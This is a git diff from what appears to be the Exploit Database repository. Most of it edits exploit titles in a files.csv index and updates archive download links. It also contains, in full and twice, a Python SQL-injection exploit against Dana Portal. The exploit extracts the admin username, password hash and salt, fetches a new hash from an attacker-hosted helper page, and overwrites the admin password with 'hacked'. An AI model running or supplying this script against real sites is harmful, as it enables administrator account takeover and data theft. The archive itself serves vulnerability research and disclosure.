diff --git a/files.csv b/files.csv
index dde916fb1..d09a71858 100755
--- a/files.csv
+++ b/files.csv
@@ -149,7 +149,7 @@ id,file,description,date,author,platform,type,port
154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - ""mremap()"" Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0
155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128
156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Win2k/XP)",2004-02-26,Rave,windows,remote,8080
-157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389
+157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389
158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21
159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21
160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - ""mremap()"" Missing ""do_munmap"" Exploit",2004-03-01,"Paul Starzetz",linux,local,0
@@ -384,7 +384,7 @@ id,file,description,date,author,platform,type,port
413,platforms/linux/remote/413.c,"MusicDaemon <= 0.0.3 - Remote DoS and /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0
416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection Vulnerability",2004-08-25,"Serkan Akpolat",linux,remote,0
417,platforms/linux/local/417.c,"SquirrelMail (chpasswd) Local Root Bruteforce Exploit",2004-08-25,Bytes,linux,local,0
-418,platforms/windows/remote/418.c,"Winamp <= 5.04 Skin File (.wsz) Remote Code Execution Exploit",2004-08-25,"Petrol Designs",windows,remote,0
+418,platforms/windows/remote/418.c,"Winamp <= 5.04 - Skin File (.wsz) Remote Code Execution Exploit",2004-08-25,"Petrol Designs",windows,remote,0
419,platforms/windows/dos/419.pl,"BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit",2004-08-26,"GulfTech Security",windows,dos,0
420,platforms/win32/dos/420.java,"Bird Chat 1.61 - Denial of Service",2004-08-26,"Donato Ferrante",win32,dos,0
421,platforms/windows/remote/421.c,"Gaucho 1.4 Mail Client Buffer Overflow Vulnerability",2004-08-27,"Tan Chew Keong",windows,remote,0
@@ -539,7 +539,7 @@ id,file,description,date,author,platform,type,port
693,platforms/windows/remote/693.c,"Ability Server <= 2.34 - Remote APPE Buffer Overflow Exploit",2004-12-16,darkeagle,windows,remote,21
694,platforms/windows/local/694.c,"WinRAR <= 3.4.1 Corrupt ZIP File Vulnerability PoC",2004-12-16,"Vafa Khoshaein",windows,local,0
695,platforms/linux/local/695.c,"Cscope <= 15.5 Symlink Vulnerability Exploit",2004-12-17,Gangstuck,linux,local,0
-697,platforms/php/webapps/697.c,"PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled)",2004-12-17,overdose,php,webapps,0
+697,platforms/php/webapps/697.c,"PHP <= 4.3.9 & phpBB 2.x - unserialize() Remote Exploit (compiled)",2004-12-17,overdose,php,webapps,0
698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS dxterm Local Buffer Overflow Exploit",2004-12-20,"Kristoffer Brånemyr",ultrix,local,0
699,platforms/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow Exploit",2004-12-20,cees-bart,aix,local,0
700,platforms/windows/dos/700.html,"Microsoft Internet Explorer & MSN Memory_Access_Violation DoS",2004-12-21,"Emmanouel Kellinis",windows,dos,0
@@ -714,7 +714,7 @@ id,file,description,date,author,platform,type,port
893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service Exploit",2005-03-21,"GSS IT",windows,dos,0
895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit",2005-03-22,sd,linux,local,0
896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0
-897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0
+897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0
898,platforms/aix/local/898.sh,"AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability",2005-03-25,ri0t,aix,local,0
899,platforms/windows/dos/899.pl,"SPECTral Personal SMTP Server <= 0.4.2 - Denial of Service Exploit",2005-03-28,GreenwooD,windows,dos,0
900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Remote Root Heap Overflow Exploit",2005-03-28,infamous41md,linux,remote,25
@@ -800,7 +800,7 @@ id,file,description,date,author,platform,type,port
982,platforms/php/webapps/982.c,"ZeroBoard Worm Source Code",2005-05-06,N/A,php,webapps,0
983,platforms/windows/dos/983.cpp,"DataTrac Activity Console Denial of Service Exploit",2005-05-06,basher13,windows,dos,0
984,platforms/multiple/dos/984.c,"Ethereal <= 0.10.10 (dissect_ipc_state) Remote Denial of Service Exploit",2005-05-07,Nicob,multiple,dos,0
-986,platforms/windows/remote/986.html,"Mozilla Firefox Install Method Remote Arbitrary Code Execution Exploit",2005-05-07,"Edward Gagnon",windows,remote,0
+986,platforms/windows/remote/986.html,"Mozilla Firefox - Install Method Remote Arbitrary Code Execution Exploit",2005-05-07,"Edward Gagnon",windows,remote,0
987,platforms/windows/remote/987.c,"Hosting Controller <= 0.6.1 Unauthenticated User Registeration (2nd)",2005-05-07,Silentium,windows,remote,0
988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service Exploit",2005-05-08,basher13,windows,dos,0
989,platforms/php/webapps/989.pl,"PhotoPost Arbitrary Data Remote Exploit",2005-05-13,basher13,php,webapps,0
@@ -2849,7 +2849,7 @@ id,file,description,date,author,platform,type,port
3178,platforms/multiple/local/3178.txt,"Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit",2007-01-23,"Joxean Koret",multiple,local,0
3179,platforms/multiple/local/3179.txt,"Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit",2007-01-23,"Joxean Koret",multiple,local,0
3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 (poll_frame.php poll_id) Remote Code Execution Exploit",2007-01-23,r0ut3r,php,webapps,0
-3181,platforms/osx/local/3181.rb,"Mac OS X 10.4.8 (UserNotificationCenter) Privilege Escalation Exploit",2007-01-23,MoAB,osx,local,0
+3181,platforms/osx/local/3181.rb,"Mac OS X 10.4.8 - (UserNotificationCenter) Privilege Escalation Exploit",2007-01-23,MoAB,osx,local,0
3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 (HTTP 404 - Object not found) DoS Exploit",2007-01-23,shinnai,windows,dos,0
3183,platforms/php/webapps/3183.txt,"BBClone 0.31 (selectlang.php) Remote File Inclusion Vulnerability",2007-01-23,3l3ctric-Cracker,php,webapps,0
3184,platforms/php/webapps/3184.txt,"phpXD <= 0.3 (path) Remote File Inclusion Vulnerability",2007-01-23,3l3ctric-Cracker,php,webapps,0
@@ -4164,7 +4164,6 @@ id,file,description,date,author,platform,type,port
4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 client.php Remote File Inclusion Vulnerability",2007-10-11,S.W.A.T.,php,webapps,0
4520,platforms/php/webapps/4520.txt,"PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability",2007-10-11,0in,php,webapps,0
4521,platforms/php/webapps/4521.txt,"Joomla Flash uploader 2.5.1 - Remote File Inclusion Vulnerabilities",2007-10-11,mdx,php,webapps,0
-4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 tif File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0
4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Newsletter Module Remote SQL Injection Exploit",2007-10-11,s4mi,php,webapps,0
4524,platforms/php/webapps/4524.txt,"joomla component com_colorlab 1.0 - Remote File Inclusion Vulnerability",2007-10-12,"Mehmet Ince",php,webapps,0
4525,platforms/php/webapps/4525.pl,"TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0
@@ -8220,7 +8219,7 @@ id,file,description,date,author,platform,type,port
8716,platforms/windows/remote/8716.py,"httpdx <= 0.5b FTP Server (USER) Remote BoF Exploit (SEH)",2009-05-18,His0k4,windows,remote,21
8717,platforms/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin Exploit",2009-05-18,ahmadbady,php,webapps,0
8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0
-8719,platforms/asp/webapps/8719.py,"Dana Portal Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0
+8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0
8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0
8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 (Get Request) Remote Denial of Service Exploit",2009-05-18,Stack,windows,dos,0
@@ -18266,7 +18265,7 @@ id,file,description,date,author,platform,type,port
20968,platforms/unix/remote/20968.txt,"Samba 2.0.x/2.2 - Remote Arbitrary File Creation Vulnerability",2001-06-23,"Michal Zalewski",unix,remote,0
20969,platforms/solaris/local/20969.c,"Solaris 8 libsldap Buffer Overflow Vulnerability (1)",2001-06-26,noir,solaris,local,0
20970,platforms/solaris/local/20970.c,"Solaris 8 libsldap Buffer Overflow Vulnerability (2)",2001-06-27,Fyodor,solaris,local,0
-20971,platforms/windows/dos/20971.txt,"Adobe Photoshop CS6 PNG Parsing Heap Overflow",2012-09-01,"Francis Provencher",windows,dos,0
+20971,platforms/windows/dos/20971.txt,"Adobe Photoshop CS6 - PNG Parsing Heap Overflow",2012-09-01,"Francis Provencher",windows,dos,0
20972,platforms/multiple/remote/20972.txt,"Icecast 1.1.x/1.3.x - Directory Traversal Vulnerability",2001-06-26,gollum,multiple,remote,0
20973,platforms/multiple/remote/20973.txt,"Icecast 1.1.x/1.3.x Slash File Name Denial of Service Vulnerability",2001-06-26,gollum,multiple,remote,0
20974,platforms/solaris/local/20974.c,"Solaris 2.6/2.6/7.0/8 whodo Buffer Overflow Vulnerability",2001-06-01,"Pablo Sor",solaris,local,0
@@ -32912,7 +32911,7 @@ id,file,description,date,author,platform,type,port
36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 'domain' Parameter Cross Site Scripting Vulnerability",2012-01-03,Atmon3r,php,webapps,0
36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 'ddb' Parameter Cross Site Scripting Vulnerability",2012-01-04,"Jonathan Claudius",php,webapps,0
36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
-36491,platforms/windows/remote/36491.txt,"Adobe Flash Player Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
+36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
36492,platforms/php/webapps/36492.txt,"GraphicsClone Script 'term' parameter Cross-Site Scripting Vulnerability",2012-01-04,Mr.PaPaRoSSe,php,webapps,0
36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-01-04,"Mesut Timur",php,webapps,0
36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 'login.php' Script Cross Site Scripting Vulnerability",2012-01-04,"Gjoko Krstic",php,webapps,0
@@ -33048,7 +33047,7 @@ id,file,description,date,author,platform,type,port
36630,platforms/php/webapps/36630.txt,"Joomla 'com_products' Component Multiple SQL Injection Vulnerabilities",2012-01-26,the_cyber_nuxbie,php,webapps,0
36631,platforms/php/webapps/36631.txt,"WordPress Slideshow Gallery Plugin 1.1.x 'border' Parameter Cross Site Scripting Vulnerability",2012-01-26,"Bret Hawk",php,webapps,0
36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x 'shopping_url' Parameter Cross Site Scripting Vulnerability",2012-01-26,sonyy,php,webapps,0
-36633,platforms/linux/dos/36633.txt,"Wireshark Buffer Underflow and Denial of Service Vulnerabilities",2012-01-10,"Laurent Butti",linux,dos,0
+36633,platforms/linux/dos/36633.txt,"Wireshark - Buffer Underflow and Denial of Service Vulnerabilities",2012-01-10,"Laurent Butti",linux,dos,0
36634,platforms/php/webapps/36634.txt,"Joomla! 'com_visa' Component Local File Include and SQL Injection Vulnerabilities",2012-01-28,the_cyber_nuxbie,php,webapps,0
36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0
36637,platforms/lin_x86/shellcode/36637.c,"Disable ASLR in Linux (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0
@@ -33083,7 +33082,7 @@ id,file,description,date,author,platform,type,port
36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 DomainConfig.do operation Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0
36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 jsp/AddDC.jsp domainName Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0
36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 'administrator.php' Cross Site Scripting Vulnerability",2012-02-07,"Chokri B.A",php,webapps,0
-36669,platforms/linux/dos/36669.txt,"Apache APR Hash Collision Denial Of Service Vulnerability",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
+36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial Of Service Vulnerability",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0
36671,platforms/php/webapps/36671.txt,"WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability",2015-04-08,"Claudio Viviani",php,webapps,80
36672,platforms/lin_x86/shellcode/36672.asm,"Linux x86 - Egg-hunter (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
@@ -33161,7 +33160,7 @@ id,file,description,date,author,platform,type,port
36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_time.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_uaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36751,platforms/php/webapps/36751.txt,"Wordpress Video Gallery 2.8 - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80
-36750,platforms/lin_x86-64/shellcode/36750.c,"linux/x86 setreuid(0_ 0) + execve(""/sbin/halt"") + exit(0) - 49 bytes",2015-04-14,"Febriyanto Nugroho",lin_x86-64,shellcode,0
+36750,platforms/lin_x86-64/shellcode/36750.c,"linux/x86 setreuid(0_ 0) + execve(""/sbin/halt"") + exit(0) (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86-64,shellcode,0
36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_user.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36756,platforms/windows/remote/36756.html,"Samsung iPOLiS ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0
36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
@@ -33221,5 +33220,7 @@ id,file,description,date,author,platform,type,port
36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0
36820,platforms/linux/local/36820.txt,"Ubuntu usb-creator 0.2.x - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
+36821,platforms/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution Vulnerability",2015-04-23,"TUNISIAN CYBER",php,webapps,0
+36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0
36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0
diff --git a/platforms/asp/webapps/8719.py b/platforms/asp/webapps/8719.py
index 9180320b9..bc80be0e6 100755
--- a/platforms/asp/webapps/8719.py
+++ b/platforms/asp/webapps/8719.py
@@ -1,132 +1,132 @@
-#!/usr/bin/python
-# Abysssec Inc Public Exploit Code
-# Title : Dana Portal Remote Change Admin Password Exploit
-# Affected Version : ASP Version
-# Vulnerable File : albumdetail.asp
-# Vendor Site : www.dana.ir
-
-# note : no point to keep it private anymore .
-# This exploit ueses of sql injection vulnerability exist in DANA Portal asp version
-# the "real" problem is when you extract SHA1 hash , hash is not clear and is SHA1+Salt
-# The alghorithm is not really hard to break and writing cracker tool but i prefered
-# To update admin password (SH1 + Salt ) with "hacked" word .
-# this exploit is just for educational purpose and author will be not be responsible for any damage using this exploit .
-# feel free to contact me at : admin [at] abysssec.com
-
-# for working with this exploit you need two asp file for updating hash you can download both from :
-# www.abysssec.com/files/dana.zip
-# www.milw0rm.com/sploits/2009-dana.zip
-
-# then need to upload asp files and change this "http://wwww.yourasphost.com/salt.asp?salt=" in exploit code
-
-import string
-import urllib
-import sys
-import re
-
-def Abysssec():
- print "\n"
- print "#####################################################"
- print "# DanaPortal Remote Change Password Exploit #"
- print "# www.Abysssec.com #"
- print "#####################################################"
- print "\n"
-
-
-
-#Call Banner
-Abysssec()
-
-print "\n[+] Target Host: e.g: http://site.com/danaportal/"
-try:
- host=raw_input("\nTarget Host : ")
-except KeyboardInterrupt:
- print "\n[-] Program Terminated"
- sys.exit()
-
-
-print "\n[+] Trying To Connect ...\n"
-
-# Check Http in string
-if host[:7] == "http://":
- pass
-else:
- host = "http://"+host
-
-
-#SQL Injection URL
-sql_inject=host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+username+from+tblAuthor)--"
-
-response = urllib.urlopen(sql_inject).read()
-
-print "[+] Trying To Inject Code ...\n"
-
-#Extract Admin User
-findall_users=re.compile('Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.').findall
-found_users=findall_users(response)
-
-#check found user length
-if len(found_ussers)==0:
- print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
- sys.exit()
-
-
-print "\n[+] Admin User : ",found_users[0]
-
-# Extract Admin Hash
-hash_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+password+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
-response = urllib.urlopen(hash_inject).read()
-findall_hashs=re.compile('Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.').findall
-found_hashs=findall_hashs(response)
-if len(found_hashs)==0:
- print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
- sys.exit()
-
-print "\n[+] Admin Hash : ",found_hashs[0]
-
-# Extract Admin Salt
-salt_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+salt+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
-response = urllib.urlopen(salt_inject).read()
-findall_salt=re.compile('Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.').findall
-found_salt=findall_salt(response)
-if len(found_salt)==0:
- print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
- sys.exit()
-print "\n[+] Admin Salt : ",found_salt[0]
-
-
-# Extract User Code
-usercode_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+user_code+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
-response = urllib.urlopen(usercode_inject).read()
-findall_usercode=re.compile('Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.').findall
-found_usercode=findall_usercode(response)
-if len(found_usercode)==0:
- print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
- sys.exit()
-
-print "\n[+] Admin Code : ",found_usercode[0]
-
-# Generate New Hash + Salt
-update_password = "http://wwww.yourasphost.com/salt.asp?salt="+found_salt[0] # change this url with yours !
-response = urllib.urlopen(update_password).read()
-findall_update=re.compile('(\w+)').findall
-
-found_update=findall_update(response)
-
-updated_hash = ''.join(found_update)
-
-# Update Password
-usercode_inject = host+"/albumdetail.asp?Gid=-1+UPDATE+tblauthor+SET+password='"+updated_hash+"'+where+username='"+found_users[0]+"'--"
-
-response = urllib.urlopen(usercode_inject).read()
-
-if len(response) == 0:
- print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
- sys.exit()
-else:
- print "[+] Updated Successfully \n"
- print "[+] Login Url : "+host+"/manage"
- print "[+] Username : "+found_users[0]
- print "[+] Password : hacked"
-
-# milw0rm.com [2009-05-18]
+#!/usr/bin/python
+# Abysssec Inc Public Exploit Code
+# Title : Dana Portal Remote Change Admin Password Exploit
+# Affected Version : ASP Version
+# Vulnerable File : albumdetail.asp
+# Vendor Site : www.dana.ir
+
+# note : no point to keep it private anymore .
+# This exploit ueses of sql injection vulnerability exist in DANA Portal asp version
+# the "real" problem is when you extract SHA1 hash , hash is not clear and is SHA1+Salt
+# The alghorithm is not really hard to break and writing cracker tool but i prefered
+# To update admin password (SH1 + Salt ) with "hacked" word .
+# this exploit is just for educational purpose and author will be not be responsible for any damage using this exploit .
+# feel free to contact me at : admin [at] abysssec.com
+
+# for working with this exploit you need two asp file for updating hash you can download both from :
+# www.abysssec.com/files/dana.zip
+# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-dana.zip
+
+# then need to upload asp files and change this "http://wwww.yourasphost.com/salt.asp?salt=" in exploit code
+
+import string
+import urllib
+import sys
+import re
+
+def Abysssec():
+ print "\n"
+ print "#####################################################"
+ print "# DanaPortal Remote Change Password Exploit #"
+ print "# www.Abysssec.com #"
+ print "#####################################################"
+ print "\n"
+
+
+
+#Call Banner
+Abysssec()
+
+print "\n[+] Target Host: e.g: http://site.com/danaportal/"
+try:
+ host=raw_input("\nTarget Host : ")
+except KeyboardInterrupt:
+ print "\n[-] Program Terminated"
+ sys.exit()
+
+
+print "\n[+] Trying To Connect ...\n"
+
+# Check Http in string
+if host[:7] == "http://":
+ pass
+else:
+ host = "http://"+host
+
+
+#SQL Injection URL
+sql_inject=host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+username+from+tblAuthor)--"
+
+response = urllib.urlopen(sql_inject).read()
+
+print "[+] Trying To Inject Code ...\n"
+
+#Extract Admin User
+findall_users=re.compile('Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.').findall
+found_users=findall_users(response)
+
+#check found user length
+if len(found_ussers)==0:
+ print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
+ sys.exit()
+
+
+print "\n[+] Admin User : ",found_users[0]
+
+# Extract Admin Hash
+hash_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+password+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
+response = urllib.urlopen(hash_inject).read()
+findall_hashs=re.compile('Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.').findall
+found_hashs=findall_hashs(response)
+if len(found_hashs)==0:
+ print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
+ sys.exit()
+
+print "\n[+] Admin Hash : ",found_hashs[0]
+
+# Extract Admin Salt
+salt_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+salt+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
+response = urllib.urlopen(salt_inject).read()
+findall_salt=re.compile('Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.').findall
+found_salt=findall_salt(response)
+if len(found_salt)==0:
+ print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
+ sys.exit()
+print "\n[+] Admin Salt : ",found_salt[0]
+
+
+# Extract User Code
+usercode_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+user_code+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
+response = urllib.urlopen(usercode_inject).read()
+findall_usercode=re.compile('Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.').findall
+found_usercode=findall_usercode(response)
+if len(found_usercode)==0:
+ print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
+ sys.exit()
+
+print "\n[+] Admin Code : ",found_usercode[0]
+
+# Generate New Hash + Salt
+update_password = "http://wwww.yourasphost.com/salt.asp?salt="+found_salt[0] # change this url with yours !
+response = urllib.urlopen(update_password).read()
+findall_update=re.compile('(\w+)').findall
+
+found_update=findall_update(response)
+
+updated_hash = ''.join(found_update)
+
+# Update Password
+usercode_inject = host+"/albumdetail.asp?Gid=-1+UPDATE+tblauthor+SET+password='"+updated_hash+"'+where+username='"+found_users[0]+"'--"
+
+response = urllib.urlopen(usercode_inject).read()
+
+if len(response) == 0:
+ print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
+ sys.exit()
+else:
+ print "[+] Updated Successfully \n"
+ print "[+] Login Url : "+host+"/manage"
+ print "[+] Username : "+found_users[0]
+ print "[+] Password : hacked"
+
+# milw0rm.com [2009-05-18]
diff --git a/platforms/cgi/webapps/17653.txt b/platforms/cgi/webapps/17653.txt
index f03a5aafd..ecb1b40d0 100755
--- a/platforms/cgi/webapps/17653.txt
+++ b/platforms/cgi/webapps/17653.txt
@@ -10,4 +10,4 @@ http://malerisch.net/docs/advisories/adobe_robohelp_dom_cross_site_scripting_xss
For reference, original vendor advisory:
http://www.adobe.com/support/security/bulletins/apsb11-23.html
-Mirror: http://www.exploit-db.com/download_pdf/17653
\ No newline at end of file
+Mirror: http://www.exploit-db.com/docs/17653.pdf
\ No newline at end of file
diff --git a/platforms/linux/dos/33585.txt b/platforms/linux/dos/33585.txt
index dec0f4c6e..c0896b37b 100755
--- a/platforms/linux/dos/33585.txt
+++ b/platforms/linux/dos/33585.txt
@@ -8,4 +8,4 @@ Versions prior to Linux kernel 2.6.33-rc6 are vulnerable.
NOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33585.tgz
\ No newline at end of file
diff --git a/platforms/linux/dos/36633.txt b/platforms/linux/dos/36633.txt
index c32c54110..bab45ed0d 100755
--- a/platforms/linux/dos/36633.txt
+++ b/platforms/linux/dos/36633.txt
@@ -6,4 +6,4 @@ Remote attackers can exploit these issues to execute arbitrary code in the conte
Wireshark versions 1.4.0 through 1.4.10 and 1.6.0 through 1.6.4 are vulnerable.
-http://www.exploit-db.com/sploits/36633.zip
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36633.zip
\ No newline at end of file
diff --git a/platforms/linux/dos/36669.txt b/platforms/linux/dos/36669.txt
index 58cf687fd..2a8e489e4 100755
--- a/platforms/linux/dos/36669.txt
+++ b/platforms/linux/dos/36669.txt
@@ -4,4 +4,4 @@ Apache APR is prone to a denial-of-service vulnerability.
An attacker can exploit this issue by sending specially crafted forms in HTTP POST requests.
-http://www.exploit-db.com/sploits/36669.zip
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36669.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/15086.py b/platforms/multiple/dos/15086.py
index ea70f70a5..422929b43 100755
--- a/platforms/multiple/dos/15086.py
+++ b/platforms/multiple/dos/15086.py
@@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/
-http://www.exploit.db.com/sploits/moaub-23-exploit.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-23-exploit.zip
'''
'''
diff --git a/platforms/multiple/dos/36570.txt b/platforms/multiple/dos/36570.txt
index 8803db968..7baf003f8 100755
--- a/platforms/multiple/dos/36570.txt
+++ b/platforms/multiple/dos/36570.txt
@@ -4,4 +4,4 @@ Rockwell Automation FactoryTalk Activation Server is prone to multiple remote de
An attacker can exploit these issues to crash the affected application, denying service to legitimate users.
-http://www.exploit-db.com/sploits/36570.zip
\ No newline at end of file
